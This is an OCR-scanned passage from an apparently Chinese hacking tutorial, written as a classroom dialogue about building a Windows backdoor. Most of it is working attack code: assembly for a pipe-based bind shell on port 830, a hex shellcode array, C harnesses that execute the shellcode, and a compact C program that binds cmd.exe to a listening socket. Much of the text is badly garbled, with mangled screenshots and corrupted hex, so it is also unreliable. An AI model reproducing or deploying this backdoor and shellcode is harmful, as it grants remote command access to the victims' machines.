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| 
== 


IF [Globals] -|i All global membere = H| emain $ main 33 т 


Вл 051 FF 15 08 52 47 пй са11 
00101 057 3B F4 сир 
HALAI 059 EH 02 Hà BB BH Call 
H8^5g8185E H9 85 60 FE FF FF mou 


16: ¿DT Lea вз D 


|8:H88|:mej2--c-|nmwiw| № 


ИШ -jenz 


|.  — sword ptr L imp socketa? (i ( 08525208) ] 
esi, esp 








. chkesp (BüYB15FB) 


dword ptr [ebp-19h5h],e&eax 


17: struct sackaddr in seruer; 
18: seruer.sin family - fiF IHET; 
полот ШЫН 66 Gi 85 58 FA FF FF mau vord ptr [ebp-548n],oFfset nain*5Bh (88581865) 
19: seruer.sin port = htans(83H); 
полог 0р SB F4 mau esl,esp 
001071 ВЕЕ B ЗЕ ü3 Bü RU push 3dEh 
Baud 74 FF 15 DC 52 à? BB Call йшкй pte [ imp htonsteà (ü85252dc)] 
09101 07А 38 F4 cnp esi, esp 
ПОЛОТ 7с ЕН óF AL AA BH call | chkesp (BübülhfF Ba) 
H84H1881 бб 89 85 БА Fñ FF FF mou word ptr [ebp-546h],ax 
2B: seruer.sin addr.s addr-ADDR АМҮ; 
BDHDBTDBBH L/ Hb 5G FA FF FF BB mau dword ptr [ebp-*5f5h], 
21: ret-bind(listenFD,(sockadür *)&seruer,sizenf(seruer)); 
c» 00101092 SH Ел mau есі „єр 
волот 09 бй 18 push 18h 
gungTmgs5 Sp SD 58 Fñ FF FF lea ecx,[ebp-588h] 
ABAT 09с 51 push BCX 
00101 090 B8B 95 6C FE FF FF mau etx dword ptr [ebp-194h] 
00101 03 52 push ейх 
BB BA FF 15 ЕЙ 52 42 BB rall dword ptr [ imp һїпї#12 (8ü85252e8)] 
00:01 Вай 3H F4 cnp esi, esp 
001071006 ЕН ЧЕ Bu HB BB rall chkesp (HdbiT^fF B) 


4 T | 


Be ORO 
üxccccCcCCC 


ЖАВ | o 910 0 | 
са е0 9/87 
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文 样 融会 弹出 内 存 窗 口 ， 如 图 3-29。 我 们 在 内 存 窗 口中 输入 server 融会 显示 出 server 的 值 : 
02 00 03 ЗЕ 00 00 00 00， 看 右 下 方 的 内 存 窗口 。 


3.4.1 转换 成 汇编 
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<< papež 一 


Microsoft Wizual С+ 
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mg "à o 
C ri le Ed.t W.ew -mnsert Project Detug Tools Driver5tud.o W:ncow ELelp 16| x] 
а жый * ње 二 -于 трае |ба| ы Т1 
[Globals] [и giobal member: > |[ e mais J-e m= t E: n 
46: Тва Dl ^ 
17: struct sockaddr in server: E 
18: seruer.sin Family = АЕ IHET: 
MA hú C7 AS SA Fñ FF FF mau werd ptre [ehn-5üáRh],nFfsPt main*5g8h {йай ) 
19: seruer.sin port = htons(830): Пећтғ Ey 
полата BE Fu Imo pri, esp - ar. m т ' 
ggha1aG6F 68 JE 02 GB GU push JFE h Е; x 2s = 2 hoo M 
HALATA FT 1% Dr ^2 5? a8 call duard ptr г imp  htonsis4 [ 95252 dc) ] S 局 = 回回 5S E] 
иаа НРА 35 FH cnp esi,esp ! 
BüN 0187 Eš 5F Bu BB Йй tall chkesp {0040 1+ { H) 
Hayatin Ой B9 $5 5H FH FF FF müü word ptr [ebp-SHOh],aX 
ёш: seruer.sin- audr.s addr=A0DE | AH; 
00591088 C7 B5 5C Fh FF FF BB mou dword ptr [ehp-Sñuh],B 
| 21: ret-bind(listenFD,(sackaddr *)&seruer,sizeoF(seruer)); 
Ip 00301072 ВВ FN mpu esi, esp 
| 005010804 бй 1E push 1йһ 
пач о1000 8b BD 58 FR FF FF lea ecx,[2bp-5ash ] 
Hüha1HQ9C 51 push P LX 
00501090 ВВ 95 607 FE FF FF т ur eüx.dword pEr [ebp-195Hh] 
nühatia 5? [rus hr РПУ 
üuühüi1ünh FF 15 EG 52 д2 йй call duword ptr [ inp Jbind&i? {004252620 ] 
mnanaTaOAna ЗЕ FH cnp esi, esp 
GUNETAN ES dF uh (B d call .  chkesp (Jd05171143E-) 
00591001 07 87 68 ГА FT ГГ тоу dword ptr [ebp 598h],eax 
t | | > 









BET2F9FA 
eizFaOS CG CC CC CC CC CC CC CG GG CC EC CC GG GG CG 
neizFmu 






ret üxcccccccCc 
[H seruer Ф... 
[B &ceruor 0.801 2Е008 





“从 图 中 可 看 出 ， 如 下 执行 后 其 实 


实 就 是 得 到 了 02 00 03 ЗЕ 00 00 00 00 ! ” 宇 强 兴 冲冲 的 说 。 


server.sin family = AF INET; 
server.sin port - htons(830); 
server.sin addr.s addr-ADDR ANY 


“对 ЯЕ f AERA, ЖИТ ИКЕН ДЕ. ! push Ox0000, push 0x0000, push 
Ox3E030002 融 在 堆栈 中 构造 出 了 sockaddr 结 构 的 值 ， 而 且 esp 融 正好 是 结构 的 地 址 。 我 们 把 
它 保存 给 esi 作 为 第 二 个 参数 压 入 堆栈 。 


“好 了 ， 剩 下 融 轻 松 了 ， 最 后 一 个 参数 是 'socket 。 
保存 在 了 ebx 中 ， 所 以 料 ebx 压 人 融 可 以 了 。 


上 面 执 行 了 socket( ) 后 ， 我 们 把 socket 的 值 


“最 后 call 调 用 函数 。bind 了 范 数 地 址 存放 在 [ebp + 36] 中 。 合 起 来 束 像 下 面 这 


;bind(listenFD,(sockaddr *)&server,sizeof(server)); 


xor edi,edi // 先 构造 server 

push edi 

push edi 

mov еах, 0х3Е030002 

push еах ; port 830 АЕ INET 

mov esi, esp // 把 server 地 址 赋 给 esi 
push 0x10 ‚ length 
push esi ; &server 

push ebx ‚ Socket 


call [ebp + 36] ; bind 


LUE); MES; Liu DR 


“ok， 理 解 


f É 


融 很 简单 吧 ? "老病 说 , “Jam Fa УЉЕ ТЕН НН Eo 


怎么 赋值 时 ， 就 参看 C 程 序 的 执行 ， 可 以 得 到 我 们 的 pipe2ASM.cpp 程 序 。” 


— asm 


push ebp; 
sub esp, 80; 
mov ерр,еѕр; 


/ / 3835 FR BATES Hber ak EA F2ERExP SPO 


mov eax,0x//eb5727a 
mov [ebp+4], eax; 
mov eax,0x77e41bb8 
mov [ebp+8], eax; 
mov еах, 0х77е97624 
mov [ebp+12], eax; 
mov eax,0x77e59d8c 
mov [ebp+16], eax; 
mov eax,0x77e58b82 
mov [ebp+20], eax; 
mov eax, 0x77e55cb5 
mov [ebp+24], eax; 
mov eax,0x71a241da 
mov [ebp+28], eax; 
mov eax,0x71a23c22 
mov [ebp+32], eax; 
mov eax,0x71a23ece 
mov [ebp+36], eax; 
mov eax,0x71a25de2 
mov [ebp+40], eax; 
mov eax,0x71a2868d 
mov [ebp+44], eax; 
mov eax,0x71a21af4 
mov [ebp+48], eax; 
mov eax,0x71a25690 
mov [ebp+52], eax; 
mov eax, 0x0 

mov [ebp+56], 0 

mov [ebp+60],0 

mov [ebp+64],0 


mov [ebp+68],0 


mov [ebp+72], © 


LWSAStartup: 


socket: 


LBind: 


LListen: 


; WSAStartup(0x202, DATA) 
sub esp, 400 
push esp 
push 0x202 
call [ebp + 28] 


;Socket(2,1,6) 
push 6 
push 1 
push 2 
call [ebp + 32] 
mov ebx, eax 


CreatePipe 
CreateProcessA 
PeekNamedPipe 
WriteFile 
ReadFile 
ExitProcess 
WSAStartup 
socket 
bind 
listen 
accept 
send 


recv 


; save socket to ebx 


;bind(listenFD,(sockaddr *)&server,sizeof(server)); 


xor edi,edi 


push edi 

push edi 

mov еах, 0х3Е030002 

push еах ‚ port 830 АЕ INET 
mov еѕі, esp 

push 0x10 ; length 
push esi ‚ &server 
push ebx socket 
call [ebp + 36] ; bind 


ZIP: EE E 


;listen(listenFD,2) 
inc edi 
inc edi 
push edi 22 
push ebx ;Socket 
call [ebp + 40] ; listen 
LAccept: 
;accept(listenFD,(sockaddr *)&server,&iAddrSize) 
push 0x10 
lea edi, [esp] 
push edi 
push esi ;&server 
push ebx ;Socket 
call [ebp + 44] ;accept 
mov ebx, eax ;save newsocket to ebx 
Createpipe1: 
; CreatePipe(&hReadPipei1,&hWritePipei,&pipeattri,0); 
xor edi,edi 
inc edi 
push edi 
xor edi,edi 
push edi 
push Oxc ;pipeattr 
mov esi, esp 
push edi ; 0 
push esi ;pipeattri 
lea eax, [ebp+60] ;&hWritePipei 
push eax 
lea eax, [ebp-«56] ;&hReadPipei 
push eax 
call [ерр+4 ] 
CreatePipe2: 
; CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0); 
push edi ; 0 
push esi ;pipeattr2 
lea eax, [ebp-*68] ;hwritePipe2 
push eax 
lea eax, [ebp+64]  ;hReadPipe2 
push eax 
call [ерр+4 ] 
CreateProcess: 
;ZeroMemory TARTUPINFO,10h PROCESS INFORMATION 44h 
sub esp, 0x80 
lea edi, [esp] 
XOr eax, eax 
push 0x80 
pop ecx 
rep stosd /7 清空 s? 欢 ,| |?? i 
;si.dwFlags 
lea edi, [esp] 
mov eax, 0x0101 
mov [edi-2ch], eax; 
;si.hStdInput = hReadPipe2 ebp+64 
mov eax, [ebp+64 
mov [edi-38h],eax 
;si.hStdOutput si.hStdError = hWritePipe1 ebp+60 
mov eax, [ebp+60 ] 
mov [edi+3ch], eax 
mov eax, [ebp+60] 
mov [edi+40h], eax 
;cmd .exe 
mov eax, 0x00646d63 
mov [еаі+64һ |, еах ;cmd 
; CreateProcess(NULL, ста іпе, NULL, NULL, 1, 0, NULL, NULL, &si,&ProcessInformation) 
lea eax, [esp-*44h] 


push eax ;&pi 
push edi ;&si 
push ecx ; 0 
push ecx ;9 
push ecx ‚0 
їпс есх 


push есх nu 


dec ecx 


push ecx ‚0 
push есх ; 0 
lea eax, [edi+64h] ;"cmd" 
push eax 
push ecx ; 0 
call [ebp-8] 
1оор1: 
;whilei 
; PeekNamedPipe(hReadPipei,Buff,1024,&lBytesRead, 0,0); 
sub esp, 400h ; 
mov esi,esp ;esi = Buff 
xor ecx, ecx 
push ecx ;0 
push ecx ;0 
lea edi, [ebp+72 | ;&lBytesRead 
push edi 
mov eax,400h 
push eax ; 1024 
push esi ; Buff 
mov eax, [ebp-*56] 
push eax ;hReadPipe1 


call [ebp+12 | 
mov eax, [edi] 
test eax,eax 
12 recv command 
send result: 
; ReadFile(hReadPipei,Buff,lBytesRead,&lBytesRead,0) 
XOr ecx,ecx 


push ecx ; 0 

push edi ;&1BytesRead 
push [edi] ;hReadPipe1 
push esi ; Buff 


push [ebp+56] ;hReadPipei 

call [ebp-*20] 
;send(clientFD,Buff,lBytesRead,O0) 
xor ecx,ecx 


push ecx ; 0 

push [edi] ;lBytesRead 
push esi ; Buff 

push ebx ;clientFD 

call [ebp+48 

jmp loop1 


recv command: 
;recv(clientFD,Buff,1024,0) 
xor ecx,ecx 
push ecx 
mov eax,400h 
push eax 
push esi 
push ebx 
call [ebp+52 | 
//1еа ecx,[edi] 
mov [edi],eax 
;WriteFile(hwritePipe2,Buff,lBytesRead,&lBytesRead,0) 
xor ecx,ecx 
push ecx 
push edi 
push [edi] 
push esi 
push [ebp+68] 
call [ebp+16] 
]mp loop1 

end: 


每 一 个 函数 的 执行 都 有 详细 的 对 应 解释 ， 大 家 下 来 可 对 照 着 参看 ，"” 老 病 说 道 , “ix B 324128 
译 、 执 行 ， 然 后 Telnet 830 端 口 。 效 果 如 图 3 一 30。” 


` pipezAsSmE 一 Nicroscft Yisual C++ 一 [pipezAsE cpp] 
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CreateProacess : 
.éceruüHemory TRRTUPIHFS,T8h PROCESS IHFÜEHATIOH 44h 
sub esp, WHN 
lea edi, [гер] 
AUF Pax, ках 


push йу#й = “F: AStudyv ЕШ УИ МИШ booki IET [15 1+ 
pop ecx = 
rep stosd A/A oi 

:5l .duFlags 


lea edi,[esp] 
поу гах, ÚRB1864 
mou [edie2ch], === = 
rsl.hStdInput = hR: ЕГ АЛИГЕ АДЕ 
mou еах,[ерр+б. 


nou [edi*dBh|,! | a m. a 
;si.hStdüutput si.l Microsoft Windows àP ЕЖ 5.1.2688] 
ua с [ebp+6 MA PZP 1985-2881 Microsoft Corp. 


nou [edi*«3ch], MEAM i 

ROU eax, | ерр+ё P 

nou [cdi*-h8h],: 
rend. exe 

hou eax, Būti. 

nau |edirółh ],i 








F: Sud sl fun Y Ee ok .telnet/r Er iw e Imat a | *H- 的 gF 


:üreatePracess(HILI изе эг it Ed 
эры ad pum 0—1 0890—21 22:41! ZDIBR2 CrpatazaPrT0cesrCHD 
push cdi 2004-11-09 BB:E 2.072 ріреїі.срр 
push юру 284-11 ИФ HA a HET TH рлреі. дт 
push есу #HH34-— 1 1 -4-H К ЕЕЕ H LU 
push ecx 2004-11-88 28:3! 41.984 pipe2C.nck 
inc еси 2004-11-07 14:5 И Microsoft 
push есх 
jec есу 


Ln 149, Cal 61 





“TER 1 成功 了 b 纯 汇 编 后 门 成 功 了 "ЕТШ, “KRT!” 


“完成 了 汇编 ， 那 接 下 来 我 们 应 该 作 什 么 呢 ? ”老病 问 道 。 


Y 


“还 用 说 吗 ? 提 取 ShellCode 啦 ! " 台 下 齐 声 回答 。 





3.4.2 看 谁 抄 得 快 一 一 提取 ShellCode 


“我 们 还 是 用 老 办 法 ， 对 艇 入 的 汇编 程序 pipe2ASM.cpp 在 VC 下 按 F10 进 入 调试 状态 ， 然 后 调 
出 汇编 对 应 的 机 器 码 ， 如 图 3 一 31。 肌 然后 啊 ? 嘿嘿...... i 


“8%, MERENI FERM ! "古风 说 道 。 


“天 啊 1 这么 多 啊 1 "小 倩 吐 了 吐 舌 头 。 


" pipez858 一 i ih RA 





pile Edit View Juse Beejeet Jelug Tels Dejiversuuliv iude klp -lej x] 
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| a: push ebp; 
|> AnA par nn push Php 
38 = sub esp, 88; 
ügudTES3D 83 EL 5H sul е=р,5 01 
чч: mou ебр,еѕр; 
00301 eha BU LE nou ebp esp 
нй: /把 要 用 到 的 函数 - 节 直 存 起 来 -一 以下 都 是 xn snn 
hd: mau Pax,lx/7/e57/27a 
üBhH1PN?2 BH 7A 72 ES 7/7 nou Pax,/4/7E5/2i/Rh 
H? - mau [ebpt*tAh],  eax; СгеаЕеРіре 
H8hg1Egh? B9 N5 BH nou dword ptr [ebp*5],eax 
м2 = mou eax,üw77ehibbs 
00001 04А BH BB “В EA 77 nu Pax, г тТЕЧТІВВЕП 
ЕЕЕ moy [ebp»s8], eax; ËreatePracessñ 
HBBDMNBTDNF 89 45 B8 пй dword ptr [ебр+8 ] „гах 
h5 = mou &ax,Wx/7/e97024 
Ud, 57 HH 25 jo EU / 7 по cax,/EU/62hh 
Nú = mow [ейр+12], гах; PeekBamedPipe 
004016057 ВЧ 45 BL. nou dword ptr [ebp*füCh] „рах 
ЫЕ mou Pax,Wx//e59d8Sc ` 








x a 
rL. 3 addrese: ПхїППППППП 
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“好 ， 我 们 来 组 织 个 比赛 一 看 谁 抄 得 快 。 最 先 把 ShellCode 正 确 提 取出 来 的 获胜 者 可 以 得 到 
一 份 神秘 礼物 1 " 老 症 说 道 。 


哦 ?好 啊 ， 好 啊 ! "同学 们 纷纷 拿 出 纸 和 笔 。 


BMRA: “预备 ! 开始 1” 

台 下 奋 笔 疾 书 ， 有 上 比赛 束 是 不 一 样 。 

“ 抄 完了 1 "古风 最 先 说 道 。 

过 了 一 会 ， 玉 波 也 说 道 : “我 也 抄 完了 。” 


慢 ， 只 好 一 笔 一 划 的 写 下 去 。 


ui 
4l 
Wi 


宇 强 急死 了 ， 但 他 写字 


老病 等 大 家 都 完成 得 差不多 了 ， 说 道 : “好 ， 大 家 可 能 都 差不多 完成 了 吧 ?” 


“是 啊 ， 手 都 痛 死 了 。"” 大 家 纷纷 忆 着 又 红 又 痛 的 手 。 

“哈哈 ! 我 第 一 1 "古风 一 脸 的 灿烂。 

玉 波 不 服气 ，* 那 也 不 一 定 ， 如 果 你 写 错 了 一 句 呢 ?或 者 少 抄 了 一 句 呢 ?， 
теле 1" 


' 不 要 峭 ，" 老 证 出 来 调解 ，" 我 们 来 验证 一 下 吧 !” 

3.4.3 验证 ShellCode 功 能 的 方法 

“提取 了 ShellCode 后 ， 怎 么 验证 它 是 否 正 确 呢 ?经常 有 人 问 如 何 知道 那些 16 进 制 ShellCode 的 
真正 功能 ， 这 里 束 说 一 下 。” 


“第 一 种 方法 ， 我 们 打开 VC， 新 建 一 个 工程 和 C 源 文件 ， 然 后 把 ShellCode 找 下 来 存 为 一 个 数 
组 (这 里 我 们 先 用 玉 波 提取 到 的 ShellCode 吧 ) ! 最 后 在 main 中 添上 ( (void(*)(void)) 
&shellcode )() ， 得 到 ‘testBindCode1.cpp’。” 


“ (( void(*)(void)) &ShellCode)() 是 什么 意思 ?” 大 家 问 道 。 


" (( (void(*)(void)) &Shellcode)() 这 人 句 是 天 键 ， 它 把 ShellCode 转 换 成 一 个 参数 为 空 、 返 回 
为 空 的 辑 数 指针 ， 并 调用 它 。 执 行 那 一 名 就 相当 于 执行 ShellCode 数 组 里 的 那些 数据 。” 老 病 
解释 道 。 


“要 验证 ShellCode 是 否 正 人 硼 完 成 功能 ， 我 们 直接 运行 看 效果 就 可 以 了 。 编 译 、 执 行 ， 
ShellCode 打 开 了 830 疹 口 ， 可 以 telnet 成 功 ， 如 图 3 一 32， 证 明 玉 波 同学 的 ShellCode 提 取 是 
正确 的 。” 


„тезе Ніл оде -~ HBicrosoft Yisual CH 一 [testBindeodel. cpp] 
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[Globals] 


Ef tectBindCo 


= 





| All global members -| & malin "JS "|| de ER 8 xp 


i:nclude £windouws.h? E 


unsigned char Shelltode[] = 

UAXSSAXBIAXELXAXOMAXHHXEKELXXHBAXFBAXIZXAXESNEZ AEEY ХА» E BEHE” 
"Aa ТВАКЕ к 7x89 x hok NE NE 7x89 GDA OC XBBNRSCT 
Ymw9DYxESYx77wx89AYXNSYNKTINDNXBENX321X88BYXE5SWXE77YX89YXISYKININXBSAXB5" 
UNRBSCXAERSNEZ ZAROT R ES КТВ Ваҳ RD ET Мн SN H22" 


EE 15 ROS БА DIS Вах EZ" 
USED EBD x7 T xROSEBSSEZTRXERRSEADSERAYNERBTSS7 TVROSERSSEPZCNSERRS УРА" 
иййаака Вахо B x56 P KZ 1x89*x 45S edu Вах X BB 
рах ОВП САУД RED CONES S ENS DE сЕ SNG NGN dS xg xoc" 
UXNxBS RA x NN o Telnet 711.83 164.120 
USXEBE2XEXBUBINEFFSE55STESxGBSx mex 
UXXDBXx3JAXFFx5 7x57 BS x BP x BHL x | 
"Ax523XRFFA E5524 RIPARIA x57 ТЕД Mcr БОР t Windows „Р [x = 5.1.2600] 
e TAA T AT EA PT 有 1985-2001 Hicrusuft Corp. 
USxXEDCSXBBEF ax I xSOEBDSxI5 | 
UAXSTAXSGXXBDAXASAxARNAKSUNXSDAx45 x ERSTER RT 
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int маіп{ } 
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I nardil ihrargy["Us2 3» ШТ": 
i (Cuaic(*x)(unid)) EShellCode j(): 


return 8; ~| 
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“哈哈 ， 我 是 保证 质量 啊 ! " 玉 波 笑 道 。 


“我 们 再 看 看 古风 同学 提取 的 ShellCode 吧 ! 使 用 第 二 种 方法 ， 在 main 里 面 下 接 佣 人 汇编 语句 
lea eax, ShellCode, call eax 。 这 是 先 把 ShellCode 的 地 址 给 eax， 然 后 call eax 跳 到 
ShellCode 里 面 去 执行 。” 


asm 


{ 


lea eax, ShellCode 


call eax 


} 


“我 们 在 main 里 加 上 图 3 一 33 里 的 这 段 汇 编 ， 然 后 执行 ， 还 是 成 功 了 ! 说 明 古 风 同 学 提取 的 也 


是 正确 的 。” 


-findcode — Microsoft Visual Cit — [Hindcode, cpp *] 
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int maing} 
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Luadlibraru("us2 32.DLL'); 
_ asm 


{ 
lea pax, 5пеі1сопе : 
Call ғах, 














， 太 好 了 1 我 还 担心 有 误 呢 1?" 调 风 笑 呵呵 的 说 。 


"UH, ANRA | 融 是 .赠送 《Q 版 系列 图 书 》 一 本 。 
“EE 1 这么 好 啊 1” 其 他 人 口水 都 流出 来 了 。 


“古风 同学 和 玉 波 同学 都 差不多 同时 完成 ， 而 且 都 正确 了 。 那 这 样 吧 ， 书 非 借 不 能 读 也 ， 你 们 
一 人 看 三 天 ， 然 后 交换 ， 过 两 个 周 后 给 我 一 个 书面 学 习 汇 报 ， 行 不 ?” 


行 1" 两 人 一 口 答应 ,“ 这 样 也 可 以 提高 效率 1” 
“好 的 。 其 他 同学 可 要 加 油 啊 ! 希望 下 一 次 得 奖 的 是 你 们 | 


“另外 ， 两 位 同学 的 ShellCode 在 这 里 ， 大 家 可 以 对 照 一 下 。 


unsigned char ShellCode[] = 

"NXBBNX83NXECNX5ONX8BNXECNXB8NX7ANXT2NXEBNX77NX89NX45NXOANXB8NXB8" 
"NXABNXEANX77NX89NX45NX08NXB8NX24NX76NXE9NX77NX89NX45NXOCNXB8NX8C" 
"NX9DNXEBNX77NX89NX45NX10NXB8NX82NX8BNXEBNX77NX89NX45NX14NXB8NXB5" 
"NXBCNXEBNX77NX89NX45NX18NXB8NXDANXA1NXA2NX71NX89NX45NX1CNXB8Nx22" 
"NXSCNXA2NX71NX89NX45NX20NXB8NXCENXSENXA2NX71NX89NX45NX24NXB8NXE2" 
"NXBDNXA2NX71NX89NX45NX28NXB8NX8DNX86NXA2NX71NX89NX45NX2CNXB8NXxF A" 
"NXTANXA2NX71NX89NX45NX30NXB8NX90NX56NXA2NX71NX89NX45NX34NXB8NX00Q" 
"NX90NX990NX09NXC6NX45NX38NX00NXCO6NX4BNX3CNXOONXCGNXABNXAONXOONXCOG" 
"NXABNXAANXOONXC6NXABNXA8NXOO0NX81NXECNX90NXO1NX00NX90NX54NX68Nx02" 
" NX02NX00NX90NXFFNXBBNXA1CNX6ANXOGNX6ANXO1NX6ANXO2NXFFNXBBNX20NX8B" 
"NXD8NX33NXFFNX57NX57NXB8NX02NXO0O0NXOGNXSENX5ONX8BNXFANXGANXA10NX56" 
"NXBSGNXFFNXBBNX24NXA7NXATNXB7NXB3NXFFNXB5NX28NX6ANX10NX8DNX3CN x24" 
"NXB7NX56NX53NXFFNXBBNX2CNX8BNXD8NX33NXFFNXA7NXB7NX33NXFFNX57NX6A" 
"NXOCNX8BNXFANXB7NXB6NX8DNXA5BNX3CNXBONX8DNXA45NX38NX5ONXFFNX5B5Nx9QA" 
"NXB7NX56NX8DNX45BNXA44ANXBONX8DNXA5NXAONXBONXFFNXBBNXOANX81NXECNX80" 
"NX90NX90NX00NX8DNX3CNX24NX33NXCONX68NX80NXOO0NXOONXOO0NX59NXF3NXAB" 
"NX8DNX3CNX24NXB8NX01NX01NX00NX00NX89NX47NX2CNX8BNX45NX40NX89Nx47" 
"NX38NX8BNX45NX3CNX89NXA7NX3CNX8BNX4BNX3CNX89NXA7NXAO0NXB8NX63NX6D" 
"NX64NX00NX89NX47NX64NX8DNX44NX24NX44NX5ONX57NXB1NXBA1NXB1NXAT1NX51" 
"NXA9NXB1NX5B1NX8DNXA7NX64NXBONXBANXFFNXBBNX9O8NX81NXECNXOO0NXOANXOQ" 
"NX0ONX8BNXFANX33NXC9NXB1NX5B1NX8DNX7DNX48NX57NXB8NX900NXO04ANX00NXx00" 
"NXBONX56NX8BNXABNX38NX5ONXFFNXBBNXOCNX8BNXO7NX85NXCONX74NX19NX33" 
"NXCONXBANX5B7NXFFNX37NXB6NXFFNX75NX38NXFFNX5BNX14NX33NXC9NX5BANXFF" 
"NXS7NX56NX53NXFFNXBBNX3ONXEBNXC3NX33NXCONX51NXB8NX00NXO0OANXO0O0NXOO" 
"NXBONX56NX53NXFFNXBBNX34NX89NXO7NX33NXCONX51NXB7NXFFNX37NX5BG6NXFF" 
"AX75NXAANXFFNXBBNX10NXEBNXAA" ; 


3.5 进一步 的 探讨 


宇 强 不 服气 的 说 : "写字 速度 是 我 的 弱项 ， 我 们 比比 其 他 方面 的 吧 ! ” 


“以 后 有 机 会 的 。 现 在 时 间 不 早 了 ， 我 们 再 进行 点 后 门 编写 于 高 级 的 讨论 吧 ! "老病 说 。 
“ 哦 1 那 好 吧 1” 


3.5.1 更 简单 的 办 法 Ж = Н ЈЕ Í] 


“我 们 讲 了 WB SI]. €exmi, E s> igus l ШЖ eE OBB AI —_—28)8 ја] ! =ë 
J$ 3638. 





“lJ? Fl ЕЕ ? 那 进程 间 怎 么 通信 呢 ? 

“不 是 不 用 管道 ，"” 老 评 纠 正道 , “TUE A HADEEOB. ” 

“ 哦 ?" 大 家 疑惑 不 解 。 

“其 实 是 这 样 的 ， 我 们 用 Socket 句 柄 下 接 蔡 代 CMD 进 程 的 输入 和 输出 句柄 ， 融 像 这 样 


si.hStdInput = si.hStdOutput = si.hStdError = (void *)clientFD; 


' 哦 ?还 可 以 这 样 啊 ! "大 家 一 


“对 ， 这 样 敬 换 后 CMD 的 输入 输出 整 可 以 直接 和 远程 通信 了 ， 省 去 了 进程 间 传 输 的 所 有 东 
pu. ^ 


W?” 


“我 们 来 看 看 实现 ，" 老 症 还 提醒 了 一 句 , “但 要 注意 ， 要 用 WSASocket(AF_INET, 

SOCK STREAM, IPPROTO ТСР, NULL, 0, 0) 来 建立 Socket 才 能 像 这 样 蔡 换 。 因 为 
WSASocket() 创 建 的 Socket 默 认 是 非 重重 套 接 字 ， 这 样 才 可 以 直接 特 cmd.exe 的 stdin、 
stdout, stderr [5] 2123825. müsocket()PqZ& 6] $8 BJSocketze EB 5 = 57, MAREX АЕ, ” 


“组 合 起 来 ， 得 到 我 们 的 需 管 道 程序 ‘pipe0.cpp”， 如 下 : 


#include <winsock2.h> 
#include <stdio.h> 

#pragma comment(lib,"Ws2 32") 
int main() 


WSADATA ws; 
SOCKET listenFD; 
int ret; 
// 初 始 化 wsa 
WSAStartup(MAKEWORD(2,2),&ws); 
// 注 意 要 用 WSASocket 
listenFD = WSASocket(AF_INET, SOCK STREAM, IPPROTO_TCP, NULL, 0, 0); 
/ / š JT ЕС а 
struct sockaddr_in server; 
server.sin_family = AF_INET; 
server.sin_port = htons(830); 
server.sin_addr.s_addr=ADDR_ANY; 
ret-bind(listenFD,(sockaddr *)&server,sizeof(server)); 
ret=listen(listenFD,2); 
// 如 果 客 户 请 求 830 端 口 ， 接 受 连接 
int iAddrSize = sizeof(server); 
SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize); 
STARTUPINFO si; 
ZeroMemory(&si,sizeof(si)); 
si.dwFlags = STARTF USESHOWWINDOW|STARTF USESTDHANDLES; 
si.wShowwindow - SW HIDE; 
si.wShowwindow = SW SHOWNORMAL; 
si.hStdInput = si.hStdOutput = si.hStdError = (void "*)clientFD; 
char cmdLine[] = "cmd.exe"; 
PROCESS INFORMATION ProcessInformation; 
// 建 立 进程 
ret-CreateProcess(NULL, cmdLine,NULL, NULL, 1, ©, NULL, NULL, &si,&ProcessInformation); 
return 0; 


TE |! 好 简短 啊 1 J 8838. 


“我 们 测试 一 下 ， 运 行 ， 打 开 了 830 端 口 ， 而 且 可 以 登陆 交互 ， 如 图 3 一 34。” 


зугт: — FTIIT Tm = [pipe0C. upp] 
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Yum HTE (Eusa 
- USñštartup(HñREMDRD(2,2) „ёме ) ; I 

/ ЕНЕ HJusnsocket Microsoft Windows XP [版 本 5.1.26881 
listenFD = uSrnSacket(AF IHET, SüGK STRE ссу Fh £u РД =] 1785-2001 Microsoft Corp- 
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struct sockaddr іп server; AA IRE S MET hook™ telnet 所 | 5:3 5 telaetln| |1952 
seruer.sin family = АЕ IHET; F :sSStudau ИДЕ, En basks tlnet | J ELE elnet 有 司 | H rdir 
seruer.sin port = htnns(820); Aa p MA: < е. EMT 


seruer.sin addr.s addr=ADDR ñHV; 
ret-hind(listenFD, (sockaddr «&seruer,s 
ret-lizczteni(licstenkD,2); 


= УРЕ |== Е?#РЗ#—И5ВС 


АНЕ = зз Г, 122) Е: Еву У ebook telnet H| AS telnetl5| ЈЕ 的 目录 
int iñddrSize = sizenfíseruer); 


SOCKET clientFD-accept(lictenFD,(cochkad ЕЕЕ Е ЕЕ E “DIB > 
2HH4-11-H5 14:19 UE 






STARTUPIMFÜ si; 2094-10-21 22:48 (DIR) CreateProcessCHD 
zoraloemory(&ci,cizenak(ci)); 9081-11-88 QUSS ріроі. сорр 
si.dwFlags = STARTF USESHOUWIBDOW|START ТРЕТИ 535 pipel.dzw 


si.wshowWindow = SW HIDE; 2004-11-087 14:5! H cC) 
£i.w&hoskindow = 5M SHÜUUHORHAL ; 10919211 1 — 138 "PEEL 1.9974 раро -nob 
"ACE EE ya 4:55 B Microsoft 
si.n$tdInput = si.hštdüutput = si.hStdE ТЕЕ ЕЕ E B 'Hicrosoft"” 
char cmüLine[] = "сті. ехе" 984-11-87 11265 a =; ЖАВ р 
FRüCESS ProcessInformation; Е ка 4:36 B "ak 
аз 208: B 20:2! 49,664 ріреі.орё 
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De hug 


"B l 这 么 简单 的 后 门 ， 写 起 来 多 容易 啊 DC 


“是 啊 ! 这 么 好 的 方法 怎么 不 早 说 呢 ? 我 们 就 不 用 写 双 管道 和 单 管道 了 。” 大 家 说 。 


“NO，” 老 病 纠 正道 ,，“ 这 三 种 开 问 口 后 门 的 办 法 ， 各 有 优 劣 。 替 管道 编写 方法 的 人 确 比 较 方便 ， 
ый "2 Mei MD ea Xcupa 井 程 执行 了 。 有 时 我 们 想 预 先 义理 一 下 用 户 的 命 信 ， 残 需 


“ 哦 ? » 


比如， 我 们 可 以 在 后 门 中 加 入 列举 进程 的 命令 一 ”pslist。CMD 里 是 没有 这 些 命 令 的 ， 所 以 我 
们 束 需 要 先 判 断 用 户 传 过 来 的 是 pslist， 然 后 在 程序 里 面 实现 列举 进程 的 功能 ， 而 不 是 传 给 
CMD 进 程 执 行 。” 


“真是 尺 有 所 短 ， 寸 有 所 长 啊 1 "同学 们 感叹 
“说 的 好 ， 束 是 这 样 的 1” 


3.5.2 ІЕЕ: ЖЕП z [p] t 


